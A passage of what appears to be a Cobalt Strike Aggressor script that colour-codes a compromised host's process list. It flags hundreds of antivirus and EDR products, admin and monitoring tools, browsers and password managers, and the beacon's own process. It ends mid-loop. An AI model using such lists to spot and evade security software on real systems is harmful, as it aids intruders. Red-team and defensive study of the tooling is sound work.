"PavReport.exe", "Pavkre.exe", "PcCtlCom.exe", "PcScnSrv.exe", "PccNTMon.exe", "PccNTUpd.exe", "PpPpWallRun.exe", "PrintDevice.exe", "ProUtil.exe", "PsCtrlS.exe", "PsImSvc.exe", "PwdFiltHelp.exe", "Qoeloader.exe", "RAVMOND.exe", "RAVXP.exe", "RNReport.exe", "RPCServ.exe", "RSSensor.exe", "RTVscan.exe", "RapApp.exe", "Rav.exe", "RavAlert.exe", "RavMon.exe", "RavMonD.exe", "RavService.exe", "RavStub.exe", "RavTask.exe", "RavTray.exe", "RavUpdate.exe", "RavXP.exe", "RealMon.exe", "Realmon.exe", "RedirSvc.exe", "RegMech.exe", "ReporterSvc.exe", "RouterNT.exe", "Rtvscan.exe", "SAFeService.exe", "SAService.exe", "SAVAdminService.exe", "SAVFMSESp.exe", "SAVMain.exe", "SAVScan.exe", "SCANMSG.exe", "SCANWSCS.exe", "SCFManager.exe", "SCFService.exe", "SCFTray.exe", "SDTrayApp.exe", "SEVINST.EXE", "SMEX_ActiveUpdate.exe", "SMEX_Master.exe", "SMEX_RemoteConf.exe", "SMEX_SystemWatch.exe", "SMSECtrl.exe", "SMSELog.exe", "SMSESJM.exe", "SMSESp.exe", "SMSESrv.exe", "SMSETask.exe", "SMSEUI.exe", "SNAC.EXE", "SNAC.exe", "SNDMon.exe", "SNDSrvc.exe", "SPBBCSvc.exe", "SPIDERML.EXE", "SPIDERNT.EXE", "SSM.exe", "SSScheduler.exe", "SVCharge.exe", "SVDealer.exe", "SVFrame.exe", "SVTray.exe", "SWNETSUP.EXE", "SavRoam.exe", "SavService.exe", "SavUI.exe", "ScanMailOutLook.exe", "SeAnalyzerTool.exe", "SemSvc.exe", "SescLU.exe", "SetupGUIMngr.exe", "SiteAdv.exe", "Smc.exe", "SmcGui.exe", "SnHwSrv.exe", "SnICheckAdm.exe", "SnIcon.exe", "SnSrv.exe", "SnicheckSrv.exe", "SpIDerAgent.exe", "SpntSvc.exe", "SpyEmergency.exe", "SpyEmergencySrv.exe", "StOPP.exe", "StWatchDog.exe", "SymCorpUI.exe", "SymSPort.exe", "TBMon.exe", "TFGui.exe", "TFService.exe", "TFTray.exe", "TFun.exe", "TIASPN~1.EXE", "TSAnSrf.exe", "TSAtiSy.exe", "TScutyNT.exe", "TSmpNT.exe", "TmListen.exe", "TmPfw.exe", "Tmntsrv.exe", "Traflnsp.exe", "TrapTrackerMgr.exe", "UPSCHD.exe", "UcService.exe", "UdaterUI.exe", "UmxAgent.exe", "UmxCfg.exe", "UmxFwHlp.exe", "UmxPol.exe", "Up2date.exe", "UpdaterUI.exe", "UrlLstCk.exe", 
"UserActivity.exe", "UserAnalysis.exe", "UsrPrmpt.exe", "V3Medic.exe", "V3Svc.exe", "VPC32.exe", "VPDN_LU.exe", "VPTray.exe", "VSStat.exe", "VsStat.exe", "VsTskMgr.exe", "WEBPROXY.EXE", "WFXCTL32.EXE", "WFXMOD32.EXE", "WFXSNT40.EXE", "WebProxy.exe", "WebScanX.exe", "WinRoute.exe", "WrSpySetup.exe", "ZLH.exe", "Zanda.exe", "ZhuDongFangYu.exe", "Zlh.exe", "_avp32.exe", "_avpcc.exe", "_avpm.exe", "aAvgApi.exe", "aawservice.exe", "acaif.exe", "acctmgr.exe", "ackwin32.exe", "aclient.exe", "adaware.exe", "advxdwin.exe", "aexnsagent.exe", "aexsvc.exe", "aexswdusr.exe", "aflogvw.exe", "afwServ.exe", "agentsvr.exe", "agentw.exe", "ahnrpt.exe", "ahnsd.exe", "ahnsdsv.exe", "alertsvc.exe", "alevir.exe", "alogserv.exe", "alsvc.exe", "alunotify.exe", "aluschedulersvc.exe", "amon9x.exe", "amswmagt.exe", "anti-trojan.exe", "antiarp.exe", "antivirus.exe", "ants.exe", "aphost.exe", "apimonitor.exe", "aplica32.exe", "aps.exe", "apvxdwin.exe", "arr.exe", "ashAvast.exe", "ashBug.exe", "ashChest.exe", "ashCmd.exe", "ashDisp.exe", "ashEnhcd.exe", "ashLogV.exe", "ashMaiSv.exe", "ashPopWz.exe", "ashQuick.exe", "ashServ.exe", "ashSimp2.exe", "ashSimpl.exe", "ashSkPcc.exe", "ashSkPck.exe", "ashUpd.exe", "ashWebSv.exe", "ashdisp.exe", "ashmaisv.exe", "ashserv.exe", "ashwebsv.exe", "asupport.exe", "aswDisp.exe", "aswRegSvr.exe", "aswServ.exe", "aswUpdSv.exe", "aswUpdsv.exe", "aswWebSv.exe", "aswupdsv.exe", "atcon.exe", "atguard.exe", "atro55en.exe", "atupdater.exe", "atwatch.exe", "atwsctsk.exe", "au.exe", "aupdate.exe", "aupdrun.exe", "aus.exe", "auto-protect.nav80try.exe", "autodown.exe", "autotrace.exe", "autoup.exe", "autoupdate.exe", "avEngine.exe", "avadmin.exe", "avcenter.exe", "avconfig.exe", "avconsol.exe", "ave32.exe", "avengine.exe", "avesvc.exe", "avfwsvc.exe", "avgam.exe", "avgamsvr.exe", "avgas.exe", "avgcc.exe", "avgcc32.exe", "avgcsrvx.exe", "avgctrl.exe", "avgdiag.exe", "avgemc.exe", "avgfws8.exe", "avgfws9.exe", "avgfwsrv.exe", "avginet.exe", "avgmsvr.exe", "avgnsx.exe", 
"avgnt.exe", "avgregcl.exe", "avgrssvc.exe", "avgrsx.exe", "avgscanx.exe", "avgserv.exe", "avgserv9.exe", "avgsystx.exe", "avgtray.exe", "avguard.exe", "avgui.exe", "avgupd.exe", "avgupdln.exe", "avgupsvc.exe", "avgvv.exe", "avgw.exe", "avgwb.exe", "avgwdsvc.exe", "avgwizfw.exe", "avkpop.exe", "avkserv.exe", "avkservice.exe", "avkwctl9.exe", "avltmain.exe", "avmailc.exe", "avmcdlg.exe", "avnotify.exe", "avnt.exe", "avp.exe", "avp32.exe", "avpcc.exe", "avpdos32.exe", "avpexec.exe", "avpm.exe", "avpncc.exe", "avps.exe", "avptc32.exe", "avpupd.exe", "avscan.exe", "avsched32.exe", "avserver.exe", "avshadow.exe", "avsynmgr.exe", "avwebgrd.exe", "avwin.exe", "avwin95.exe", "avwinnt.exe", "avwupd.exe", "avwupd32.exe", "avwupsrv.exe", "avxmonitor9x.exe", "avxmonitornt.exe", "avxquar.exe", "backweb.exe", "bargains.exe", "basfipm.exe", "bd_professional.exe", "bdagent.exe", "bdc.exe", "bdlite.exe", "bdmcon.exe", "bdss.exe", "bdsubmit.exe", "beagle.exe", "belt.exe", "bidef.exe", "bidserver.exe", "bipcp.exe", "bipcpevalsetup.exe", "bisp.exe", "blackd.exe", "blackice.exe", "blink.exe", "blss.exe", "bmrt.exe", "bootconf.exe", "bootwarn.exe", "borg2.exe", "bpc.exe", "bpk.exe", "brasil.exe", "bs120.exe", "bundle.exe", "bvt.exe", "bwgo0000.exe", "ca.exe", "caav.exe", "caavcmdscan.exe", "caavguiscan.exe", "caf.exe", "cafw.exe", "caissdt.exe", "capfaem.exe", "capfasem.exe", "capfsem.exe", "capmuamagt.exe", "casc.exe", "casecuritycenter.exe", "caunst.exe", "cavrep.exe", "cavrid.exe", "cavscan.exe", "cavtray.exe", "ccApp.exe", "ccEvtMgr.exe", "ccLgView.exe", "ccProxy.exe", "ccSetMgr.exe", "ccSetmgr.exe", "ccSvcHst.exe", "ccap.exe", "ccapp.exe", "ccevtmgr.exe", "cclaw.exe", "ccnfagent.exe", "ccprovsp.exe", "ccproxy.exe", "ccpxysvc.exe", "ccschedulersvc.exe", "ccsetmgr.exe", "ccsmagtd.exe", "ccsvchst.exe", "ccsystemreport.exe", "cctray.exe", "ccupdate.exe", "cdp.exe", "cfd.exe", "cfftplugin.exe", "cfgwiz.exe", "cfiadmin.exe", "cfiaudit.exe", "cfinet.exe", "cfinet32.exe", "cfnotsrvd.exe", 
"cfp.exe", "cfpconfg.exe", "cfpconfig.exe", "cfplogvw.exe", "cfpsbmit.exe", "cfpupdat.exe", "cfsmsmd.exe", "checkup.exe", "cka.exe", "clamscan.exe", "claw95.exe", "claw95cf.exe", "clean.exe", "cleaner.exe", "cleaner3.exe", "cleanpc.exe", "cleanup.exe", "click.exe", "cmdagent.exe", "cmdinstall.exe", "cmesys.exe", "cmgrdian.exe", "cmon016.exe", "comHost.exe", "connectionmonitor.exe", "control_panel.exe", "cpd.exe", "cpdclnt.exe", "cpf.exe", "cpf9x206.exe", "cpfnt206.exe", "crashrep.exe", "csacontrol.exe", "csinject.exe", "csinsm32.exe", "csinsmnt.exe", "csrss_tc.exe", "ctrl.exe", "cv.exe", "cwnb181.exe", "cwntdwmo.exe", "cz.exe", "datemanager.exe", "dbserv.exe", "dbsrv9.exe", "dcomx.exe", "defalert.exe", "defscangui.exe", "defwatch.exe", "deloeminfs.exe", "deputy.exe", "diskmon.exe", "divx.exe", "djsnetcn.exe", "dllcache.exe", "dllreg.exe", "doors.exe", "doscan.exe", "dpf.exe", "dpfsetup.exe", "dpps2.exe", "drwagntd.exe", "drwatson.exe", "drweb.exe", "drweb32.exe", "drweb32w.exe", "drweb386.exe", "drwebcgp.exe", "drwebcom.exe", "drwebdc.exe", "drwebmng.exe", "drwebscd.exe", "drwebupw.exe", "drwebwcl.exe", "drwebwin.exe", "drwupgrade.exe", "dsmain.exe", "dssagent.exe", "dvp95.exe", "dvp95_0.exe", "dwengine.exe", "dwhwizrd.exe", "dwwin.exe", "ecengine.exe", "edisk.exe", "efpeadm.exe", "egui.exe", "ekrn.exe", "elogsvc.exe", "emet_agent.exe", "emet_service.exe", "emsw.exe", "engineserver.exe", "ent.exe", "era.exe", "esafe.exe", "escanhnt.exe", "escanv95.exe", "esecagntservice.exe", "esecservice.exe", "esmagent.exe", "espwatch.exe", "etagent.exe", "ethereal.exe", "etrustcipe.exe", "evpn.exe", "evtProcessEcFile.exe", "evtarmgr.exe", "evtmgr.exe", "exantivirus-cnet.exe", "exe.avxw.exe", "execstat.exe", "expert.exe", "explore.exe", "f-agnt95.exe", "f-prot.exe", "f-prot95.exe", "f-stopw.exe", "fameh32.exe", "fast.exe", "fch32.exe", "fih32.exe", "findviru.exe", "firesvc.exe", "firetray.exe", "firewall.exe", "fmon.exe", "fnrb32.exe", "fortifw.exe", "fp-win.exe", 
"fp-win_trial.exe", "fprot.exe", "frameworkservice.exe", "frminst.exe", "frw.exe", "fsaa.exe", "fsaua.exe", "fsav.exe", "fsav32.exe", "fsav530stbyb.exe", "fsav530wtbyb.exe", "fsav95.exe", "fsavgui.exe", "fscuif.exe", "fsdfwd.exe", "fsgk32.exe", "fsgk32st.exe", "fsguidll.exe", "fsguiexe.exe", "fshdll32.exe", "fsm32.exe", "fsma32.exe", "fsmb32.exe", "fsorsp.exe", "fspc.exe", "fspex.exe", "fsqh.exe", "fssm32.exe", "fwinst.exe", "gator.exe", "gbmenu.exe", "gbpoll.exe", "gcascleaner.exe", "gcasdtserv.exe", "gcasinstallhelper.exe", "gcasnotice.exe", "gcasserv.exe", "gcasservalert.exe", "gcasswupdater.exe", "generics.exe", "gfireporterservice.exe", "ghost_2.exe", "ghosttray.exe", "giantantispywaremain.exe", "giantantispywareupdater.exe", "gmt.exe", "guard.exe", "guarddog.exe", "guardgui.exe", "hacktracersetup.exe", "hbinst.exe", "hbsrv.exe", "hipsvc.exe", "hotactio.exe", "hotpatch.exe", "htlog.exe", "htpatch.exe", "hwpe.exe", "hxdl.exe", "hxiul.exe", "iamapp.exe", "iamserv.exe", "iamstats.exe", "ibmasn.exe", "ibmavsp.exe", "icepack.exe", "icload95.exe", "icloadnt.exe", "icmon.exe", "icsupp95.exe", "icsuppnt.exe", "idle.exe", "iedll.exe", "iedriver.exe", "iface.exe", "ifw2000.exe", "igateway.exe", "inetlnfo.exe", "infus.exe", "infwin.exe", "inicio.exe", "init.exe", "inonmsrv.exe", "inorpc.exe", "inort.exe", "inotask.exe", "intdel.exe", "intren.exe", "iomon98.exe", "isPwdSvc.exe", "isUAC.exe", "isafe.exe", "isafinst.exe", "issvc.exe", "istsvc.exe", "jammer.exe", "jdbgmrg.exe", "jedi.exe", "kaccore.exe", "kansgui.exe", "kansvr.exe", "kastray.exe", "kav.exe", "kav32.exe", "kavfs.exe", "kavfsgt.exe", "kavfsrcn.exe", "kavfsscs.exe", "kavfswp.exe", "kavisarv.exe", "kavlite40eng.exe", "kavlotsingleton.exe", "kavmm.exe", "kavpers40eng.exe", "kavpf.exe", "kavshell.exe", "kavss.exe", "kavstart.exe", "kavsvc.exe", "kavtray.exe", "kazza.exe", "keenvalue.exe", "kerio-pf-213-en-win.exe", "kerio-wrl-421-en-win.exe", "kerio-wrp-421-en-win.exe", "kernel32.exe", "killprocesssetup161.exe", 
"kis.exe", "kislive.exe", "kissvc.exe", "klnacserver.exe", "klnagent.exe", "klserver.exe", "klswd.exe", "klwtblfs.exe", "kmailmon.exe", "knownsvr.exe", "kpf4gui.exe", "kpf4ss.exe", "kpfw32.exe", "kpfwsvc.exe", "krbcc32s.exe", "kvdetech.exe", "kvolself.exe", "kvsrvxp.exe", "kvsrvxp_1.exe", "kwatch.exe", "kwsprod.exe", "kxeserv.exe", "launcher.exe", "ldnetmon.exe", "ldpro.exe", "ldpromenu.exe", "ldscan.exe", "leventmgr.exe", "livesrv.exe", "lmon.exe", "lnetinfo.exe", "loader.exe", "localnet.exe", "lockdown.exe", "lockdown2000.exe", "log_qtine.exe", "lookout.exe", "lordpe.exe", "lsetup.exe", "luall.exe", "luau.exe", "lucallbackproxy.exe", "lucoms.exe", "lucomserver.exe", "lucoms~1.exe", "luinit.exe", "luspt.exe", "makereport.exe", "mantispm.exe", "mapisvc32.exe", "masalert.exe", "massrv.exe", "mcafeefire.exe", "mcagent.exe", "mcappins.exe", "mcconsol.exe", "mcdash.exe", "mcdetect.exe", "mcepoc.exe", "mcepocfg.exe", "mcinfo.exe", "mcmnhdlr.exe", "mcmscsvc.exe", "mcods.exe", "mcpalmcfg.exe", "mcpromgr.exe", "mcregwiz.exe", "mcscript.exe", "mcscript_inuse.exe", "mcshell.exe", "mcshield.exe", "mcshld9x.exe", "mcsysmon.exe", "mctool.exe", "mctray.exe", "mctskshd.exe", "mcuimgr.exe", "mcupdate.exe", "mcupdmgr.exe", "mcvsftsn.exe", "mcvsrte.exe", "mcvsshld.exe", "mcwce.exe", "mcwcecfg.exe", "md.exe", "mfeann.exe", "mfevtps.exe", "mfin32.exe", "mfw2en.exe", "mfweng3.02d30.exe", "mgavrtcl.exe", "mgavrte.exe", "mghtml.exe", "mgui.exe", "minilog.exe", "mmod.exe", "monitor.exe", "monsvcnt.exe", "monsysnt.exe", "moolive.exe", "mostat.exe", "mpcmdrun.exe", "mpf.exe", "mpfagent.exe", "mpfconsole.exe", "mpfservice.exe", "mpftray.exe", "mps.exe", "mpsevh.exe", "mpsvc.exe", "mrf.exe", "mrflux.exe", "msapp.exe", "msascui.exe", "msbb.exe", "msblast.exe", "mscache.exe", "msccn32.exe", "mscifapp.exe", "mscman.exe", "msconfig.exe", "msdm.exe", "msdos.exe", "msiexec16.exe", "mskagent.exe", "mskdetct.exe", "msksrver.exe", "msksrvr.exe", "mslaugh.exe", "msmgt.exe", "msmpeng.exe", 
"msmsgri32.exe", "msscli.exe", "msseces.exe", "mssmmc32.exe", "msssrv.exe", "mssys.exe", "msvxd.exe", "mu0311ad.exe", "mwatch.exe", "myagttry.exe", "n32scanw.exe", "nSMDemf.exe", "nSMDmon.exe", "nSMDreal.exe", "nSMDsch.exe", "naPrdMgr.exe", "nav.exe", "navap.navapsvc.exe", "navapsvc.exe", "navapw32.exe", "navdx.exe", "navlu32.exe", "navnt.exe", "navstub.exe", "navw32.exe", "navwnt.exe", "nc2000.exe", "ncinst4.exe", "MSASCuiL.exe");
@av1 = @("MBAMService.exe", "mbamtray.exe", "CylanceSvc.exe", "ndd32.exe", "ndetect.exe", "neomonitor.exe", "neotrace.exe", "neowatchlog.exe", "netalertclient.exe", "netarmor.exe", "netcfg.exe", "netd32.exe", "netinfo.exe", "netmon.exe", "netscanpro.exe", "netspyhunter-1.2.exe", "netstat.exe", "netutils.exe", "networx.exe", "ngctw32.exe", "ngserver.exe", "nip.exe", "nipsvc.exe", "nisoptui.exe", "nisserv.exe", "nisum.exe", "njeeves.exe", "nlsvc.exe", "nmain.exe", "nod32.exe", "nod32krn.exe", "nod32kui.exe", "normist.exe", "norton_internet_secu_3.0_407.exe", "notstart.exe", "npf40_tw_98_nt_me_2k.exe", "npfmessenger.exe", "npfmntor.exe", "npfmsg.exe", "nprotect.exe", "npscheck.exe", "npssvc.exe", "nrmenctb.exe", "nsched32.exe", "nscsrvce.exe", "nsctop.exe", "nsmdtr.exe", "nssys32.exe", "nstask32.exe", "nsupdate.exe", "nt.exe", "ntcaagent.exe", "ntcadaemon.exe", "ntcaservice.exe", "ntrtscan.exe", "ntvdm.exe", "ntxconfig.exe", "nui.exe", "nupgrade.exe", "nvarch16.exe", "nvc95.exe", "nvcoas.exe", "nvcsched.exe", "nvsvc32.exe", "nwinst4.exe", "nwservice.exe", "nwtool16.exe", "nymse.exe", "oasclnt.exe", "oespamtest.exe", "ofcdog.exe", "ofcpfwsvc.exe", "okclient.exe", "olfsnt40.exe", "ollydbg.exe", "onsrvr.exe", "op_viewer.exe", "opscan.exe", "optimize.exe", "ostronet.exe", "otfix.exe", "outpost.exe", "outpostinstall.exe", "outpostproinstall.exe", "paamsrv.exe", "padmin.exe", "pagent.exe", "pagentwd.exe", "panixk.exe", "patch.exe", "pavbckpt.exe", "pavcl.exe", "pavfires.exe", "pavfnsvr.exe", "pavjobs.exe", "pavkre.exe", "pavmail.exe", "pavprot.exe", "pavproxy.exe", "pavprsrv.exe", "pavsched.exe", "pavsrv50.exe", "pavsrv51.exe", "pavsrv52.exe", "pavupg.exe", "pavw.exe", "pccNT.exe", "pccclient.exe", "pccguide.exe", "pcclient.exe", "pccnt.exe", "pccntmon.exe", "pccntupd.exe", "pccpfw.exe", "pcctlcom.exe", "pccwin98.exe", "pcfwallicon.exe", "pcip10117_0.exe", "pcscan.exe", "pctsAuxs.exe", "pctsGui.exe", "pctsSvc.exe", "pctsTray.exe", "pdsetup.exe", "pep.exe", "periscope.exe", 
"persfw.exe", "perswf.exe", "pf2.exe", "pfwadmin.exe", "pgmonitr.exe", "pingscan.exe", "platin.exe", "pmon.exe", "pnmsrv.exe", "pntiomon.exe", "pop3pack.exe", "pop3trap.exe", "poproxy.exe", "popscan.exe", "portdetective.exe", "portmonitor.exe", "powerscan.exe", "ppinupdt.exe", "ppmcativedetection.exe", "pptbc.exe", "ppvstop.exe", "pqibrowser.exe", "pqv2isvc.exe", "prevsrv.exe", "prizesurfer.exe", "prmt.exe", "prmvr.exe", "programauditor.exe", "proport.exe", "protectx.exe", "psctris.exe", "psh_svc.exe", "psimreal.exe", "psimsvc.exe", "pskmssvc.exe", "pspf.exe", "purge.exe", "pview.exe", "pviewer.exe", "pxemtftp.exe", "pxeservice.exe", "qclean.exe", "qconsole.exe", "qdcsfs.exe", "qoeloader.exe", "qserver.exe", "rapapp.exe", "rapuisvc.exe", "ras.exe", "rasupd.exe", "rav7.exe", "rav7win.exe", "rav8win32eng.exe", "ravmon.exe", "ravmond.exe", "ravstub.exe", "ravxp.exe", "ray.exe", "rb32.exe", "rcsvcmon.exe", "rcsync.exe", "realmon.exe", "reged.exe", "remupd.exe", "reportsvc.exe", "rescue.exe", "rescue32.exe", "rfwmain.exe", "rfwproxy.exe", "rfwsrv.exe", "rfwstub.exe", "rnav.exe", "rrguard.exe", "rshell.exe", "rsnetsvr.exe", "rstray.exe", "rtvscan.exe", "rtvscn95.exe", "rulaunch.exe", "saHookMain.exe", "safeboxtray.exe", "safeweb.exe", "sahagent.exescan32.exe", "sav32cli.exe", "save.exe", "savenow.exe", "savroam.exe", "savscan.exe", "savservice.exe", "sbserv.exe", "scam32.exe", "scan32.exe", "scan95.exe", "scanexplicit.exe", "scanfrm.exe", "scanmailoutlook.exe", "scanpm.exe", "schdsrvc.exe", "schupd.exe", "scrscan.exe", "seestat.exe", "serv95.exe", "setloadorder.exe", "setup_flowprotector_us.exe", "setupguimngr.exe", "setupvameeval.exe", "sfc.exe", "sgssfw32.exe", "sh.exe", "shellspyinstall.exe", "shn.exe", "showbehind.exe", "shstat.exe", "siteadv.exe", "smOutlookPack.exe", "smc.exe", "smoutlookpack.exe", "sms.exe", "smsesp.exe", "smss32.exe", "sndmon.exe", "sndsrvc.exe", "soap.exe", "sofi.exe", "softManager.exe", "spbbcsvc.exe", "spf.exe", "sphinx.exe", 
"spideragent.exe", "spiderml.exe", "spidernt.exe", "spiderui.exe", "spntsvc.exe", "spoler.exe", "spoolcv.exe", "spoolsv32.exe", "spyxx.exe", "srexe.exe", "srng.exe", "srvload.exe", "srvmon.exe", "ss3edit.exe", "sschk.exe", "ssg_4104.exe", "ssgrate.exe", "st2.exe", "stcloader.exe", "stinger.exe", "stopp.exe", "stwatchdog.exe", "supftrl.exe", "support.exe", "supporter5.exe", "svcGenericHost", "svcharge.exe", "svchostc.exe", "svchosts.exe", "svcntaux.exe", "svdealer.exe", "svframe.exe", "svtray.exe", "swdsvc.exe", "sweep95.exe", "sweepnet.sweepsrv.sys.swnetsup.exe", "sweepsrv.exe", "swnetsup.exe", "swnxt.exe", "swserver.exe", "symlcsvc.exe", "symproxysvc.exe", "symsport.exe", "symtray.exe", "symwsc.exe", "sysdoc32.exe", "sysedit.exe", "sysupd.exe", "taskmo.exe", "taumon.exe", "tbmon.exe", "tbscan.exe", "tc.exe", "tca.exe", "tclproc.exe", "tcm.exe", "tdimon.exe", "tds-3.exe", "tds2-98.exe", "tds2-nt.exe", "teekids.exe", "tfak.exe", "tfak5.exe", "tgbob.exe", "titanin.exe", "titaninxp.exe", "tmas.exe", "tmlisten.exe", "tmntsrv.exe", "tmpfw.exe", "tmproxy.exe", "tnbutil.exe", "tpsrv.exe", "tracesweeper.exe", "trickler.exe", "trjscan.exe", "trjsetup.exe", "trojantrap3.exe", "trupd.exe", "tsadbot.exe", "tvmd.exe", "tvtmd.exe", "udaterui.exe", "undoboot.exe", "unvet32.exe", "updat.exe", "updtnv28.exe", "upfile.exe", "upgrad.exe", "uplive.exe", "urllstck.exe", "usergate.exe", "usrprmpt.exe", "utpost.exe", "v2iconsole.exe", "v3clnsrv.exe", "v3exec.exe", "v3imscn.exe", "vbcmserv.exe", "vbcons.exe", "vbust.exe", "vbwin9x.exe", "vbwinntw.exe", "vcsetup.exe", "vet32.exe", "vet95.exe", "vetmsg.exe", "vettray.exe", "vfsetup.exe", "vir-help.exe", "virusmdpersonalfirewall.exe", "vnlan300.exe", "vnpc3000.exe", "vpatch.exe", "vpc32.exe", "vpc42.exe", "vpfw30s.exe", "vprosvc.exe", "vptray.exe", "vrv.exe", "vrvmail.exe", "vrvmon.exe", "vrvnet.exe", "vscan40.exe", "vscenu6.02d30.exe", "vsched.exe", "vsecomr.exe", "vshwin32.exe", "vsisetup.exe", "vsmain.exe", "vsmon.exe", "vsserv.exe", 
"vsstat.exe", "vstskmgr.exe", "vswin9xe.exe", "vswinntse.exe", "vswinperse.exe", "w32dsm89.exe", "w9x.exe", "watchdog.exe", "webdav.exe", "webproxy.exe", "webscanx.exe", "webtrap.exe", "webtrapnt.exe", "wfindv32.exe", "wfxctl32.exe", "wfxmod32.exe", "wfxsnt40.exe", "whoswatchingme.exe", "wimmun32.exe", "win-bugsfix.exe", "winactive.exe", "winmain.exe", "winnet.exe", "winppr32.exe", "winrecon.exe", "winroute.exe", "winservn.exe", "winssk32.exe", "winstart.exe", "winstart001.exe", "wintsk32.exe", "winupdate.exe", "wkufind.exe", "wnad.exe", "wnt.exe", "wradmin.exe", "wrctrl.exe", "wsbgate.exe", "wssfcmai.exe", "wupdater.exe", "wupdt.exe", "wyvernworksfirewall.exe", "xagt.exe", "xagtnotif.exe", "xcommsvr.exe", "xfilter.exe", "xpf202en.exe", "zanda.exe", "zapro.exe", "zapsetup3001.exe", "zatutor.exe", "zhudongfangyu.exe", "zlclient.exe", "zlh.exe", "zonalm2601.exe", "zonealarm.exe", "cb.exe", "MsMpEng.exe", "MsSense.exe", "CSFalconService.exe", "CSFalconContainer.exe", "redcloak.exe", "OmniAgent.exe","CrAmTray.exe","AmSvc.exe","minionhost.exe","PylumLoader.exe","CrsSvc.exe");
@admin = @("MobaXterm.exe", "bash.exe", "git-bash.exe", "mmc.exe", "Code.exe", "notepad++.exe", "notepad.exe", "cmd.exe", "drwatson.exe", "DRWTSN32.EXE", "drwtsn32.exe", "dumpcap.exe", "ethereal.exe", "filemon.exe", "idag.exe", "idaw.exe", "k1205.exe", "loader32.exe", "netmon.exe", "netstat.exe", "netxray.exe", "NmWebService.exe", "nukenabber.exe", "portmon.exe", "powershell.exe", "PRTG Traffic Gr.exe", "PRTG Traffic Grapher.exe", "prtgwatchdog.exe", "putty.exe", "regmon.exe", "SystemEye.exe", "taskman.exe", "TASKMGR.EXE", "tcpview.exe", "Totalcmd.exe", "TrafMonitor.exe", "windbg.exe", "winobj.exe", "wireshark.exe", "WMonAvNScan.exe", "WMonAvScan.exe", "WMonSrv.exe","regedit.exe", "regedit32.exe", "accesschk.exe", "accesschk64.exe", "AccessEnum.exe", "ADExplorer.exe", "ADInsight.exe", "adrestore.exe", "Autologon.exe", "Autoruns.exe", "Autoruns64.exe", "autorunsc.exe", "autorunsc64.exe", "Bginfo.exe", "Bginfo64.exe", "Cacheset.exe", "Clockres.exe", "Clockres64.exe", "Contig.exe", "Contig64.exe", "Coreinfo.exe", "ctrl2cap.exe", "Dbgview.exe", "Desktops.exe", "disk2vhd.exe", "diskext.exe", "diskext64.exe", "Diskmon.exe", "DiskView.exe", "du.exe", "du64.exe", "efsdump.exe", "FindLinks.exe", "FindLinks64.exe", "handle.exe", "handle64.exe", "hex2dec.exe", "hex2dec64.exe", "junction.exe", "junction64.exe", "ldmdump.exe", "Listdlls.exe", "Listdlls64.exe", "livekd.exe", "livekd64.exe", "LoadOrd.exe", "LoadOrd64.exe", "LoadOrdC.exe", "LoadOrdC64.exe", "logonsessions.exe", "logonsessions64.exe", "movefile.exe", "movefile64.exe", "notmyfault.exe", "notmyfault64.exe", "notmyfaultc.exe", "notmyfaultc64.exe", "ntfsinfo.exe", "ntfsinfo64.exe", "pagedfrg.exe", "pendmoves.exe", "pendmoves64.exe", "pipelist.exe", "pipelist64.exe", "portmon.exe", "procdump.exe", "procdump64.exe", "procexp.exe", "procexp64.exe", "Procmon.exe", "PsExec.exe", "PsExec64.exe", "psfile.exe", "psfile64.exe", "PsGetsid.exe", "PsGetsid64.exe", "PsInfo.exe", "PsInfo64.exe", "pskill.exe", "pskill64.exe", 
"pslist.exe", "pslist64.exe", "PsLoggedon.exe", "PsLoggedon64.exe", "psloglist.exe", "pspasswd.exe", "pspasswd64.exe", "psping.exe", "psping64.exe", "PsService.exe", "PsService64.exe", "psshutdown.exe", "pssuspend.exe", "pssuspend64.exe", "RAMMap.exe", "RegDelNull.exe", "RegDelNull64.exe", "regjump.exe", "ru.exe", "ru64.exe", "sdelete.exe", "sdelete64.exe", "ShareEnum.exe", "ShellRunas.exe", "sigcheck.exe", "sigcheck64.exe", "streams.exe", "streams64.exe", "strings.exe", "strings64.exe", "sync.exe", "sync64.exe", "Sysmon.exe", "Sysmon64.exe", "Tcpvcon.exe", "Tcpview.exe", "Testlimit.exe", "Testlimit64.exe", "vmmap.exe", "Volumeid.exe", "Volumeid64.exe", "whois.exe", "whois64.exe", "Winobj.exe", "ZoomIt.exe", "KeePass.exe", "1Password.exe", "lastpass.exe");
local('$outps $temp $name $ppid $pid $arch $user $session @ps');
$outps .= "\cC[*]\o Process List with process highlighting\n";
$outps .= "\cC[*]\o Current Running PID: \c8 Yellow ". $bd['pid'] ." \o \n";
$outps .= "\cC[*]\o Explorer/Winlogon: \c2 BLUE \o \n";
$outps .= "\cC[*]\o Admin Tools: \cB LIGHT BLUE \o \n";
$outps .= "\cC[*]\o Browsers: \c3 GREEN \o \n";
$outps .= "\cC[*]\o AV/EDR: \c4 RED \o \n\n";
$outps .= " PID PPID Name Arch Session User\n";
$outps .= "\cE --- ---- ---- ---- ------- -----\n";
foreach $temp (split("\n", ["$2" trim])) {
($name, $ppid, $pid, $arch, $user, $session) = split("\t", $temp);
# highlight AV processes in RED.
if(iff($name in @av,true,false)) {
push(@ps, %(pid => $pid, entry => "\c4 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
# highlight current process in YELLOW
} else if ($pid eq $bd['pid']) {
push(@ps, %(pid => $pid, entry => "\c8 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
# highlight explorer , winlogon in BLUE
} else if ($name eq "explorer.exe" || $name eq "winlogon.exe") {
push(@ps, %(pid => $pid, entry => "\c2 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
# highlight browsers processes in GREEN
} else if ($name eq "chrome.exe" || $name eq "firefox.exe" || $name eq "iexplore.exe" || $name eq "MicrosoftEdgeCP.exe" || $name eq "MicrosoftEdge.exe") {
push(@ps, %(pid => $pid, entry => "\c3 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
# highlight av1 processes in RED.
} else if(iff($name in @av1,true,false)) {
push(@ps, %(pid => $pid, entry => "\c4 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
# highlight Admin Tools in Light Blue
} else if(iff($name in @admin,true,false)) {
push(@ps, %(pid => $pid, entry => "\cB $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
} else {
push(@ps, %(pid => $pid, entry => " $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user"));
}
}
# sort the processes please
sort({ return $1['pid'] <=> $2['pid']; }, @ps);
# append to our outstring
foreach $temp (@ps) {
